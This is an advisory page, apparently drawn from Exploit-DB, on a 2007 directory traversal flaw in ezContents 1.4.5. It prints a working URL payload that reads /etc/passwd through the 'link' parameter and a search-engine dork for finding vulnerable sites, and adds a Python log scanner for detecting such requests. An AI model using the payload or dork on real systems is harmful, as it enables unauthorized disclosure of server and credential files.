vendor: ezContents
by: p4imi0
CVSS: 7.5 HIGH
Remote File Disclosure
CWE: 200
Product Name: ezContents
Affected Version From: 1.4.2005
Affected Version To: 1.4.2005
Patch Exists: NO
Related CWE:
CPE: a:ezcontents:ezcontents:1.4.5
Metasploit:
Other Scripts:
Platforms Tested:
2007

ezContents Version 1.4.5 Remote File Disclosure Vulnerability

This vulnerability allows an attacker to disclose arbitrary files on the server. The 'link' parameter of index.php accepts URL-encoded directory traversal sequences ('..%2F'), so a request for '/ezcontents1_4x/index.php?link=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd' gives access to sensitive files such as '/etc/passwd'.

Mitigation:

Upgrade to a newer version of ezContents or apply a patch if available. Restrict access to the vulnerable URL.
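
To check whether the 'link' parameter has already been requested with traversal sequences, web server access logs can be searched after decoding the parameter. The following is an added example, not part of the original advisory or of ezContents; the log format (common log format), the sample lines and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed access-log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = """\
198.51.100.7 - - [05/Dec/2007:10:01:02 +0000] "GET /ezcontents1_4x/index.php?link=news HTTP/1.1" 200 5120
198.51.100.9 - - [05/Dec/2007:10:02:11 +0000] "GET /ezcontents1_4x/index.php?link=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1843
203.0.113.4 - - [05/Dec/2007:10:03:40 +0000] "GET /ezcontents1_4x/index.php?link=%252e%252e%252fetc%252fpasswd HTTP/1.1" 404 310
198.51.100.7 - - [05/Dec/2007:10:05:19 +0000] "GET /ezcontents1_4x/index.php?link=modules%2Fnews HTTP/1.1" 200 7001
"""

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

def normalise(value, max_rounds=5):
    """Percent-decode until stable so repeated encoding cannot hide '../'."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value.replace("\\", "/")

def is_traversal(value):
    """True if the value climbs out of its directory or is an absolute path."""
    path = normalise(value)
    return path.startswith("/") or ".." in path.split("/")

def suspicious_requests(log_text, param="link"):
    """Return (client_ip, decoded_value, http_status) for each flagged request."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target, status = match.group(1), int(match.group(2))
        for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            if name == param and is_traversal(value):
                # A 200 status means the server answered; review what was returned.
                hits.append((line.split()[0], normalise(value), status))
    return hits

if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(hit)
```

The same `is_traversal` check can back a temporary request filter in front of index.php while no patch is available.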

Exploit-DB raw data:

--------------------------------------------------------------
ezContents Version 1.4.5 Remote File Disclosure Vulnerability.
--------------------------------------------------------------

download    : http://www.visualshapers.com/
author      : p4imi0
contact     : p4imi0@gmail.com
exploit     : /ezcontents1_4x/index.php?link=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
google dork : inurl:"index.php?link=" Powered by ezContents Version 1.4.5
thanks to   : str0ke, Cr[]w.

# milw0rm.com [2007-12-05]